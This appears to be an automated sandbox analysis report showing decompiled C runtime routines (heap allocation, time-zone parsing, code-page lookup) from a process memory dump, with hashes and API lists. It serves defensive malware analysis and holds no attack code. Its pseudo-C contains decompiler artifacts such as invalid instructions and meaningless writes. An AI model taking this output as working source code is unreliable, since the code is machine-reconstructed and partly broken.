                                                                                                                                                              • Instruction ID: 462545f4816c7f54677bec52fe94ba3ab7656dc8076db0b70ebc98d08a6eaf6f
                                                                                                                                                              • Opcode Fuzzy Hash: 94cfdba95cb9f1173952f890fba6cf35439c0c9803fb76d0777186a914c53558
                                                                                                                                                              • Instruction Fuzzy Hash: B621B337A0864647DB618F28D48037976B0EB88F54F145236E65D876E5DF3FE4018B05
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF6E4C6D4F0 Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 86%
                                                                                                                                                              			E00007FF67FF6E4C6D4F0(long long* __rax, long long __rbx, long long __rcx, long long _a8, long long _a16) {

				r8d = 0x40;
				goto 0xe4c6d42c;
				asm("int3");
				_a16 = __rbx;
				_a8 = __rcx;
				if (__rcx != 0) goto 0xe4c6d532;
				E00007FF67FF6E4C6C854(__rax);
				 *__rax = 0x16;
				return E00007FF67FF6E4C6A5D8();
			}



                                                                                                                                                              0x7ff6e4c6d4f0
                                                                                                                                                              0x7ff6e4c6d4f6
                                                                                                                                                              0x7ff6e4c6d4fb
                                                                                                                                                              0x7ff6e4c6d4fc
                                                                                                                                                              0x7ff6e4c6d501
                                                                                                                                                              0x7ff6e4c6d511
                                                                                                                                                              0x7ff6e4c6d513
                                                                                                                                                              0x7ff6e4c6d518
                                                                                                                                                              0x7ff6e4c6d531

                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000B.00000002.401874825.00007FF6E4C41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF6E4C40000, based on PE: true
                                                                                                                                                              • Associated: 0000000B.00000002.401841691.00007FF6E4C40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.401978343.00007FF6E4C89000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.402012688.00007FF6E4CA9000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.402023641.00007FF6E4CAC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_11_2_7ff6e4c40000_System.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3215553584-0
                                                                                                                                                              • Opcode ID: d2bab4befcdc2425bbeb2248411935522ecd43e52291b029098dd4d43bbfbca4
                                                                                                                                                              • Instruction ID: 4d418238f179b4fb99b7a1d20f383b6584f10d0512184e805f91cfb012df5496
                                                                                                                                                              • Opcode Fuzzy Hash: d2bab4befcdc2425bbeb2248411935522ecd43e52291b029098dd4d43bbfbca4
                                                                                                                                                              • Instruction Fuzzy Hash: A111A22BE6C68341FB609E30D48037956B0AF85F88F548076EE4D87686DE6FEC00874A
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF6E4C7AA74 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 68%
                                                                                                                                                              			E00007FF67FF6E4C7AA74(void* __ecx, void* __rax, long long __rbx, long long __rdi, long long __rsi, long long _a8, long long _a16, long long _a24) {
				void* _t7;
				void* _t15;

				_a8 = __rbx;
				_a16 = __rsi;
				_a24 = __rdi;
				if (_t15 - 0x2000 < 0) goto 0xe4c7aabc;
				_t7 = E00007FF67FF6E4C6C854(__rax);
				asm("sti");
				asm("invalid");
				return _t7;
			}





                                                                                                                                                              0x7ff6e4c7aa74
                                                                                                                                                              0x7ff6e4c7aa79
                                                                                                                                                              0x7ff6e4c7aa7e
                                                                                                                                                              0x7ff6e4c7aa91
                                                                                                                                                              0x7ff6e4c7aa93
                                                                                                                                                              0x7ff6e4c7aaa1
                                                                                                                                                              0x7ff6e4c7aaa2
                                                                                                                                                              0x7ff6e4c7aabb

                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000B.00000002.401874825.00007FF6E4C41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF6E4C40000, based on PE: true
                                                                                                                                                              • Associated: 0000000B.00000002.401841691.00007FF6E4C40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.401978343.00007FF6E4C89000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.402012688.00007FF6E4CA9000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.402023641.00007FF6E4CAC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_11_2_7ff6e4c40000_System.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3215553584-0
                                                                                                                                                              • Opcode ID: 916b0a1d7e4077e872f60012507b6f9c692079abd0a1790d589d1f6d4eb9da05
                                                                                                                                                              • Instruction ID: 0faee6b19078a997346aac9153d19603d4a243dd9f9f612d9301f64fbaf9db5d
                                                                                                                                                              • Opcode Fuzzy Hash: 916b0a1d7e4077e872f60012507b6f9c692079abd0a1790d589d1f6d4eb9da05
                                                                                                                                                              • Instruction Fuzzy Hash: F5118B3B99C64782F3109B34A4C423972B1EB84F80F455036E64EC7AD6DE3EE8108B0A
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF6E4C77598 Relevance: 1.5, APIs: 1, Instructions: 36memoryCOMMONLIBRARYCODE
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                              			E00007FF67FF6E4C77598(void* __eax, signed int __rcx, signed int __rdx) {
				void* _t8;

				if (__rcx == 0) goto 0xe4c775b7;
				if (0xffffffffffffffe0 - __rdx < 0) goto 0xe4c775fa;
				_t21 =  ==  ? 0x1 : __rcx * __rdx;
				goto 0xe4c775de;
				E00007FF67FF6E4C73FDC();
				if (0x1 == 0) goto 0xe4c775fa;
				E00007FF67FF6E4C71868(0x1,  ==  ? 0x1 : __rcx * __rdx);
				if (0x1 == 0) goto 0xe4c775fa;
				 *0x1 =  *0x1 + 0x1; // executed
				if (0x1 == 0) goto 0xe4c775c9;
				goto 0xe4c77607;
				_t8 = E00007FF67FF6E4C6C854(0x1);
				 *0x1 = 0xc;
				return _t8;
			}




                                                                                                                                                              0x7ff6e4c775a7
                                                                                                                                                              0x7ff6e4c775b5
                                                                                                                                                              0x7ff6e4c775c4
                                                                                                                                                              0x7ff6e4c775c7
                                                                                                                                                              0x7ff6e4c775c9
                                                                                                                                                              0x7ff6e4c775d0
                                                                                                                                                              0x7ff6e4c775d5
                                                                                                                                                              0x7ff6e4c775dc
                                                                                                                                                              0x7ff6e4c775f1
                                                                                                                                                              0x7ff6e4c775f6
                                                                                                                                                              0x7ff6e4c775f8
                                                                                                                                                              0x7ff6e4c775fa
                                                                                                                                                              0x7ff6e4c775ff
                                                                                                                                                              0x7ff6e4c7760c

                                                                                                                                                              APIs
                                                                                                                                                              • RtlAllocateHeap.NTDLL(?,?,00000000,00007FF6E4C75C9D,?,?,8000000000000000,00007FF6E4C6C85D,?,?,?,?,00007FF6E4C76B4D), ref: 00007FF6E4C775ED
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000B.00000002.401874825.00007FF6E4C41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF6E4C40000, based on PE: true
                                                                                                                                                              • Associated: 0000000B.00000002.401841691.00007FF6E4C40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.401978343.00007FF6E4C89000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.402012688.00007FF6E4CA9000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.402023641.00007FF6E4CAC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_11_2_7ff6e4c40000_System.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: AllocateHeap
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1279760036-0
                                                                                                                                                              • Opcode ID: dd011263cfd5eed50cb31384353f6acc74ebaf5b411cf7c3f915f75005d88c0d
                                                                                                                                                              • Instruction ID: f7d9c22fda75f5737931390addde525d8876dc6fd471fda2c05f8c35dde813f8
                                                                                                                                                              • Opcode Fuzzy Hash: dd011263cfd5eed50cb31384353f6acc74ebaf5b411cf7c3f915f75005d88c0d
                                                                                                                                                              • Instruction Fuzzy Hash: E5F04F4EB8E20B42FE95577595D93B402A05F89F80F485432C90EC73D2EE1EF481821B
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF6E4C61CA8 Relevance: 1.5, APIs: 1, Instructions: 14COMMONLIBRARYCODE
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • RtlEncodePointer.NTDLL(?,?,?,?,00007FF6E4C61395,?,?,00000000,00007FF6E4C61189,?,?,?,00007FF6E4C4B03B), ref: 00007FF6E4C61CB6
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000B.00000002.401874825.00007FF6E4C41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF6E4C40000, based on PE: true
                                                                                                                                                              • Associated: 0000000B.00000002.401841691.00007FF6E4C40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.401978343.00007FF6E4C89000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.402012688.00007FF6E4CA9000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.402023641.00007FF6E4CAC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_11_2_7ff6e4c40000_System.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: EncodePointer
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2118026453-0
                                                                                                                                                              • Opcode ID: 1252d47fc620bb06a527e8cdad921947cee60a4209efeb817a6077a81d70148e
                                                                                                                                                              • Instruction ID: b813281c3c0f0bbed9972a85cb0b36f0301196344affda89409402a8e1af04aa
                                                                                                                                                              • Opcode Fuzzy Hash: 1252d47fc620bb06a527e8cdad921947cee60a4209efeb817a6077a81d70148e
                                                                                                                                                              • Instruction Fuzzy Hash: ECE0EC6ED9CA0791EA046761A8C63B522B4EF48F80F500433C60EC76A18F7E7099D70B
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF6E4C608EC Relevance: 1.5, APIs: 1, Instructions: 9fileCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • FindNextFileW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,FFFFFFFF,?,?,00000000,00007FF6E4C4B533), ref: 00007FF6E4C608F0
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000B.00000002.401874825.00007FF6E4C41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF6E4C40000, based on PE: true
                                                                                                                                                              • Associated: 0000000B.00000002.401841691.00007FF6E4C40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.401978343.00007FF6E4C89000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.402012688.00007FF6E4CA9000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.402023641.00007FF6E4CAC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_11_2_7ff6e4c40000_System.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: FileFindNext
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2029273394-0
                                                                                                                                                              • Opcode ID: d58f433f6114c0440ad6ed4d206ede844564032550680f30e4580e32145411b4
                                                                                                                                                              • Instruction ID: e9dc2a9ee462a060a3ce49cd5c00359f0ce75721af9e025e161b6a407009587c
                                                                                                                                                              • Opcode Fuzzy Hash: d58f433f6114c0440ad6ed4d206ede844564032550680f30e4580e32145411b4
                                                                                                                                                              • Instruction Fuzzy Hash: D9C04C1AFA9503C1E6585B735CC633111B06B4DF10F504176C10AC2150DE5FB1979717
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Non-executed Functions

                                                                                                                                                              Function 00007FF6E4C7D444 Relevance: 12.6, APIs: 6, Strings: 1, Instructions: 329timeCOMMONCrypto
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 93%
                                                                                                                                                              			E00007FF67FF6E4C7D444(void* __ecx, void* __eflags, intOrPtr* __rax, signed int __rbx, signed char* __rcx, long long _a8, signed int _a16, signed int _a24) {
				void* _t30;
				intOrPtr _t43;
				intOrPtr _t45;
				void* _t46;
				signed int _t47;
				signed int _t48;
				void* _t49;
				void* _t50;
				signed long long _t60;
				signed char _t68;
				void* _t80;
				intOrPtr* _t82;
				signed long long _t84;
				long long* _t87;
				signed long long _t89;
				intOrPtr* _t93;
				char* _t94;
				intOrPtr* _t95;
				intOrPtr* _t96;
				void* _t97;
				intOrPtr* _t98;
				signed long long _t105;
				signed long long _t110;
				signed long long _t123;
				signed char* _t127;
				void* _t128;
				void* _t130;
				void* _t138;
				intOrPtr* _t141;

				_t82 = __rax;
				_a8 = __rbx;
				E00007FF67FF6E4C7CEC0(_t30);
				_a16 = _a16 & 0x00000000;
				_a24 = _a24 & 0x00000000;
				_t141 = _t82;
				E00007FF67FF6E4C7CF28(_t82,  &_a16);
				if (_t82 != 0) goto 0xe4c7d634;
				E00007FF67FF6E4C7CEC8(_t82,  &_a24);
				if (_t82 != 0) goto 0xe4c7d634;
				_t105 =  *0xe4cabd30; // 0x0
				_t60 = _t105;
				if (_t60 == 0) goto 0xe4c7d4be;
				r9d = __rcx[_t105 - __rcx] & 0x000000ff;
				if (_t60 != 0) goto 0xe4c7d4b6;
				_t84 =  &(__rcx[1]);
				if (r9d != 0) goto 0xe4c7d4a1;
				if (( *__rcx & 0x000000ff) == 0) goto 0xe4c7d623;
				E00007FF67FF6E4C76B28(_t84, _t105);
				_t89 = __rbx | 0xffffffff;
				if (__rcx[_t89 + 1] != 0) goto 0xe4c7d4ca;
				E00007FF67FF6E4C782BC(_t84, _t89 + 2);
				 *0xe4cabd30 = _t84;
				E00007FF67FF6E4C76B28(_t84, 0);
				_t110 =  *0xe4cabd30; // 0x0
				if (_t110 == 0) goto 0xe4c7d623;
				if (__rcx[_t89 + 1] != 0) goto 0xe4c7d4f9;
				E00007FF67FF6E4C74464(_t84, _t110, _t89 + 2, __rcx);
				if (_t84 != 0) goto 0xe4c7d634;
				_t12 = _t84 + 3; // 0x3
				r13d = _t12;
				r9d = r13d;
				_t13 = _t84 + 0x40; // 0x40
				E00007FF67FF6E4C84418(_t84, _t89 + 1,  *_t141, _t13, __rcx, _t138);
				if (_t84 != 0) goto 0xe4c7d634;
				_t68 =  *__rcx;
				if (_t68 == 0) goto 0xe4c7d544;
				_t127 =  &(__rcx[1]);
				if (_t68 != 0) goto 0xe4c7d536;
				sil =  *_t127;
				_t93 =  !=  ? _t127 :  &(_t127[1]);
				E00007FF67FF6E4C74EE0(_t93);
				dil = 0x30;
				_a16 = _t84 * 0xe10;
				if ( *_t93 == 0x2b) goto 0xe4c7d575;
				if ( *_t93 - dil - 9 > 0) goto 0xe4c7d57a;
				_t94 = _t93 + 1;
				goto 0xe4c7d567;
				if ( *_t94 != 0x3a) goto 0xe4c7d5d8;
				_t95 = _t94 + 1;
				E00007FF67FF6E4C74EE0(_t95);
				_t43 =  *_t95;
				_a16 = _a16 + _t84 * 0x3c;
				if (_t43 - dil < 0) goto 0xe4c7d5b1;
				if (_t43 - 0x39 > 0) goto 0xe4c7d5b1;
				_t96 = _t95 + 1;
				_t45 =  *_t96;
				if (_t45 - dil >= 0) goto 0xe4c7d59e;
				if (_t45 != 0x3a) goto 0xe4c7d5d8;
				_t97 = _t96 + 1;
				_t46 = E00007FF67FF6E4C74EE0(_t97);
				_t123 = _a16 + _t84;
				_a16 = _t123;
				goto 0xe4c7d5d1;
				if (_t46 - 0x39 > 0) goto 0xe4c7d5d8;
				_t98 = _t97 + 1;
				_t47 =  *_t98;
				if (_t47 - dil >= 0) goto 0xe4c7d5ca;
				if (sil != 0x2d) goto 0xe4c7d5e3;
				_a16 =  ~_t123;
				_t80 =  *_t98 - _t47;
				_t48 = _t47 & 0xffffff00 | _t80 != 0x00000000;
				_a24 = 0;
				if (_t80 == 0) goto 0xe4c7d60c;
				asm("adc ch, [esi]");
				 *((intOrPtr*)(_t130 - 0x14d58a40)) =  *((intOrPtr*)(_t130 - 0x14d58a40)) + _t48;
				_t87 =  *((intOrPtr*)(_t141 + 8)) + _t128;
				 *_t87 =  *_t87 + _t48;
				_t49 = E00007FF67FF6E4C7CEB8(_t48);
				 *_t87 = _a16;
				_t50 = E00007FF67FF6E4C7CEA8(_t49);
				 *_t87 = _a24;
				return _t50;
			}
































                                                                                                                                                              0x7ff6e4c7d444
                                                                                                                                                              0x7ff6e4c7d444
                                                                                                                                                              0x7ff6e4c7d45a
                                                                                                                                                              0x7ff6e4c7d45f
                                                                                                                                                              0x7ff6e4c7d467
                                                                                                                                                              0x7ff6e4c7d46b
                                                                                                                                                              0x7ff6e4c7d46e
                                                                                                                                                              0x7ff6e4c7d475
                                                                                                                                                              0x7ff6e4c7d47f
                                                                                                                                                              0x7ff6e4c7d486
                                                                                                                                                              0x7ff6e4c7d48c
                                                                                                                                                              0x7ff6e4c7d493
                                                                                                                                                              0x7ff6e4c7d496
                                                                                                                                                              0x7ff6e4c7d4a4
                                                                                                                                                              0x7ff6e4c7d4ac
                                                                                                                                                              0x7ff6e4c7d4ae
                                                                                                                                                              0x7ff6e4c7d4b4
                                                                                                                                                              0x7ff6e4c7d4b8
                                                                                                                                                              0x7ff6e4c7d4be
                                                                                                                                                              0x7ff6e4c7d4c3
                                                                                                                                                              0x7ff6e4c7d4d1
                                                                                                                                                              0x7ff6e4c7d4d6
                                                                                                                                                              0x7ff6e4c7d4dd
                                                                                                                                                              0x7ff6e4c7d4e4
                                                                                                                                                              0x7ff6e4c7d4e9
                                                                                                                                                              0x7ff6e4c7d4f3
                                                                                                                                                              0x7ff6e4c7d500
                                                                                                                                                              0x7ff6e4c7d509
                                                                                                                                                              0x7ff6e4c7d510
                                                                                                                                                              0x7ff6e4c7d519
                                                                                                                                                              0x7ff6e4c7d519
                                                                                                                                                              0x7ff6e4c7d51d
                                                                                                                                                              0x7ff6e4c7d520
                                                                                                                                                              0x7ff6e4c7d529
                                                                                                                                                              0x7ff6e4c7d530
                                                                                                                                                              0x7ff6e4c7d536
                                                                                                                                                              0x7ff6e4c7d539
                                                                                                                                                              0x7ff6e4c7d53b
                                                                                                                                                              0x7ff6e4c7d542
                                                                                                                                                              0x7ff6e4c7d544
                                                                                                                                                              0x7ff6e4c7d54f
                                                                                                                                                              0x7ff6e4c7d556
                                                                                                                                                              0x7ff6e4c7d561
                                                                                                                                                              0x7ff6e4c7d564
                                                                                                                                                              0x7ff6e4c7d56a
                                                                                                                                                              0x7ff6e4c7d573
                                                                                                                                                              0x7ff6e4c7d575
                                                                                                                                                              0x7ff6e4c7d578
                                                                                                                                                              0x7ff6e4c7d57d
                                                                                                                                                              0x7ff6e4c7d57f
                                                                                                                                                              0x7ff6e4c7d585
                                                                                                                                                              0x7ff6e4c7d590
                                                                                                                                                              0x7ff6e4c7d594
                                                                                                                                                              0x7ff6e4c7d59a
                                                                                                                                                              0x7ff6e4c7d5a3
                                                                                                                                                              0x7ff6e4c7d5a5
                                                                                                                                                              0x7ff6e4c7d5a8
                                                                                                                                                              0x7ff6e4c7d5af
                                                                                                                                                              0x7ff6e4c7d5b3
                                                                                                                                                              0x7ff6e4c7d5b5
                                                                                                                                                              0x7ff6e4c7d5bb
                                                                                                                                                              0x7ff6e4c7d5c3
                                                                                                                                                              0x7ff6e4c7d5c5
                                                                                                                                                              0x7ff6e4c7d5c8
                                                                                                                                                              0x7ff6e4c7d5cc
                                                                                                                                                              0x7ff6e4c7d5ce
                                                                                                                                                              0x7ff6e4c7d5d1
                                                                                                                                                              0x7ff6e4c7d5d6
                                                                                                                                                              0x7ff6e4c7d5dc
                                                                                                                                                              0x7ff6e4c7d5e0
                                                                                                                                                              0x7ff6e4c7d5e5
                                                                                                                                                              0x7ff6e4c7d5e7
                                                                                                                                                              0x7ff6e4c7d5ea
                                                                                                                                                              0x7ff6e4c7d5f1
                                                                                                                                                              0x7ff6e4c7d602
                                                                                                                                                              0x7ff6e4c7d605
                                                                                                                                                              0x7ff6e4c7d60b
                                                                                                                                                              0x7ff6e4c7d60d
                                                                                                                                                              0x7ff6e4c7d612
                                                                                                                                                              0x7ff6e4c7d617
                                                                                                                                                              0x7ff6e4c7d61c
                                                                                                                                                              0x7ff6e4c7d621
                                                                                                                                                              0x7ff6e4c7d633

                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000B.00000002.401874825.00007FF6E4C41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF6E4C40000, based on PE: true
                                                                                                                                                              • Associated: 0000000B.00000002.401841691.00007FF6E4C40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.401978343.00007FF6E4C89000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.402012688.00007FF6E4CA9000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.402023641.00007FF6E4CAC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_11_2_7ff6e4c40000_System.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: _get_daylight$_invalid_parameter_noinfo$InformationTimeZone
                                                                                                                                                              • String ID: ?
                                                                                                                                                              • API String ID: 435049134-1684325040
                                                                                                                                                              • Opcode ID: ba3d3555acfa22156daf7e7946e578976ca0140c6bdaa573d04065b041711d05
                                                                                                                                                              • Instruction ID: 0c3fb3a6ed92666a784da77174bf28b719c130c59c7d54629016df9d7f92fa15
                                                                                                                                                              • Opcode Fuzzy Hash: ba3d3555acfa22156daf7e7946e578976ca0140c6bdaa573d04065b041711d05
                                                                                                                                                              • Instruction Fuzzy Hash: E5D1902BA4C2438BE7609F3599C53B92BA0AF44F98F445137EA0D876D5DF3EE441870A
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF6E4C80F88 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 222COMMONLIBRARYCODE
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 69%
                                                                                                                                                              			E00007FF67FF6E4C80F88(void* __ecx, void* __edx, long long __rbx, intOrPtr* __rcx, signed short* __rdx, long long __rdi, long long __rsi, void* __r8, signed int __r9) {
				int _t46;
				signed short _t51;
				void* _t52;
				void* _t78;
				intOrPtr* _t79;
				intOrPtr* _t81;
				void* _t82;
				intOrPtr* _t85;
				intOrPtr* _t86;
				intOrPtr* _t111;
				void* _t113;
				intOrPtr* _t116;
				long long _t119;
				void* _t120;
				void* _t122;
				signed long long _t135;
				void* _t136;
				void* _t137;
				int _t139;
				signed short* _t140;
				void* _t142;
				intOrPtr* _t143;

				_t52 = __ecx;
				_t78 = _t122;
				 *((long long*)(_t78 + 8)) = __rbx;
				 *((long long*)(_t78 + 0x10)) = _t119;
				 *((long long*)(_t78 + 0x18)) = __rsi;
				 *((long long*)(_t78 + 0x20)) = __rdi;
				_t120 = __r8;
				_t140 = __rdx;
				_t116 = __rcx;
				E00007FF67FF6E4C75AC4(_t78, __rbx, __rdx, __rcx, _t142);
				r12d = 0;
				_t5 = _t78 + 0x98; // 0x98
				_t85 = _t5;
				_t79 = _t116 + 0x80;
				 *((intOrPtr*)(_t85 + 0x10)) = r12d;
				_t8 = _t85 + 0x258; // 0x2f0
				_t143 = _t8;
				 *_t85 = _t116;
				_t9 = _t85 + 8; // 0xa0
				_t111 = _t9;
				 *_t143 = r12w;
				 *_t111 = _t79;
				if ( *_t79 == r12w) goto 0xe4c80ffd;
				_t10 = _t137 + 0x16; // 0x16
				E00007FF67FF6E4C80EEC(_t10, _t85, 0xe4c9a510, _t111, _t116, _t111);
				if ( *((intOrPtr*)( *_t85)) == r12w) goto 0xe4c81053;
				if ( *((intOrPtr*)( *_t111)) == r12w) goto 0xe4c81016;
				E00007FF67FF6E4C8087C(_t85, _t85, _t111, __r9);
				goto 0xe4c8101b;
				E00007FF67FF6E4C8094C(_t85, _t85, _t111, __r9);
				if ( *((intOrPtr*)(_t85 + 0x10)) != r12d) goto 0xe4c81062;
				 *((long long*)(__r8 + 0x481f74c0)) =  *((long long*)(__r8 + 0x481f74c0)) + 1;
				_t81 =  *_t111;
				if ( *_t81 == r12w) goto 0xe4c8104c;
				E00007FF67FF6E4C8087C(_t85, _t85, _t85, __r9);
				goto 0xe4c81058;
				E00007FF67FF6E4C8094C(_t85, _t85, _t85, __r9);
				goto 0xe4c81058;
				E00007FF67FF6E4C807D4(_t52,  *_t81 - r12w, _t85, _t85, 0x40, _t85, __r9);
				if ( *((intOrPtr*)(_t85 + 0x10)) == r12d) goto 0xe4c811b5;
				if ( *_t116 != r12w) goto 0xe4c8107d;
				if ( *((intOrPtr*)(_t116 + 0x100)) != r12w) goto 0xe4c8107d;
				GetACP();
				goto 0xe4c81085;
				E00007FF67FF6E4C80DBC(_t52, _t85, _t116 + 0x100, _t85, _t116, __r8, __r9);
				_t86 = _t81;
				if (_t81 == 0) goto 0xe4c811b5;
				if (_t81 == 0xfde8) goto 0xe4c811b5;
				_t46 = IsValidCodePage(_t139);
				if (_t81 == 0) goto 0xe4c811b5;
				if (_t140 == 0) goto 0xe4c810b3;
				 *_t140 = _t51;
				if (_t120 == 0) goto 0xe4c811ae;
				 *((intOrPtr*)(_t120 + 0x120)) = r12w;
				_t135 = (__r9 | 0xffffffff) + 1;
				if ( *((intOrPtr*)(_t143 + _t135 * 2)) != r12w) goto 0xe4c810cb;
				_t136 = _t135 + 1;
				asm("in al, dx");
				asm("loop 0x1");
				 *((long long*)(_t120 - 0x197af040)) =  *((long long*)(_t120 - 0x197af040)) + 1;
				 *_t81 =  *_t81 + _t46;
				 *((intOrPtr*)(_t120 + 0x48 + (_t51 & 0x0000ffff) * 4)) =  *((intOrPtr*)(_t120 + 0x48 + (_t51 & 0x0000ffff) * 4)) + _t46;
				spl = 0x6a;
				asm("invalid");
				if (_t81 == 0) goto 0xe4c811b5;
				r9d = 0x40;
				asm("invalid");
				asm("invalid");
				if (_t81 == 0) goto 0xe4c811b5;
				asm("jmp dword 0xc085:0x4800005f");
				_t113 = _t137;
				 *_t81 =  *_t81 + _t46;
				if (_t81 != 0) goto 0xe4c81153;
				_t28 = _t81 + 0x2e; // 0x2e
				E00007FF67FF6E4C87128(_t10, _t113, _t136);
				if (_t81 == 0) goto 0xe4c8116c;
				r9d = 0x40;
				_t29 = _t136 - 0x39; // 0x7
				E00007FF67FF6E4C77BB8(_t29, _t81, _t81, _t86, _t120 + 0x120, _t120 + 0x120, _t120, _t113);
				if (_t81 == 0) goto 0xe4c811b5;
				_t82 = _t120 + 0x100;
				if (_t86 != 0xfde9) goto 0xe4c8119a;
				r9d = 5;
				E00007FF67FF6E4C7F3D4(_t82, _t86, _t82, _t28, L"utf8", _t136);
				if (_t82 != 0) goto 0xe4c811d6;
				goto 0xe4c811ae;
				r9d = 0xa;
				_t32 = _t136 + 6; // 0x46
				r8d = _t32;
				return E00007FF67FF6E4C85B80(_t52);
			}

























                                                                                                                                                              0x7ff6e4c80f88
                                                                                                                                                              0x7ff6e4c80f88
                                                                                                                                                              0x7ff6e4c80f8b
                                                                                                                                                              0x7ff6e4c80f8f
                                                                                                                                                              0x7ff6e4c80f93
                                                                                                                                                              0x7ff6e4c80f97
                                                                                                                                                              0x7ff6e4c80fa5
                                                                                                                                                              0x7ff6e4c80fa8
                                                                                                                                                              0x7ff6e4c80fab
                                                                                                                                                              0x7ff6e4c80fae
                                                                                                                                                              0x7ff6e4c80fb3
                                                                                                                                                              0x7ff6e4c80fb9
                                                                                                                                                              0x7ff6e4c80fb9
                                                                                                                                                              0x7ff6e4c80fc0
                                                                                                                                                              0x7ff6e4c80fc7
                                                                                                                                                              0x7ff6e4c80fcb
                                                                                                                                                              0x7ff6e4c80fcb
                                                                                                                                                              0x7ff6e4c80fd2
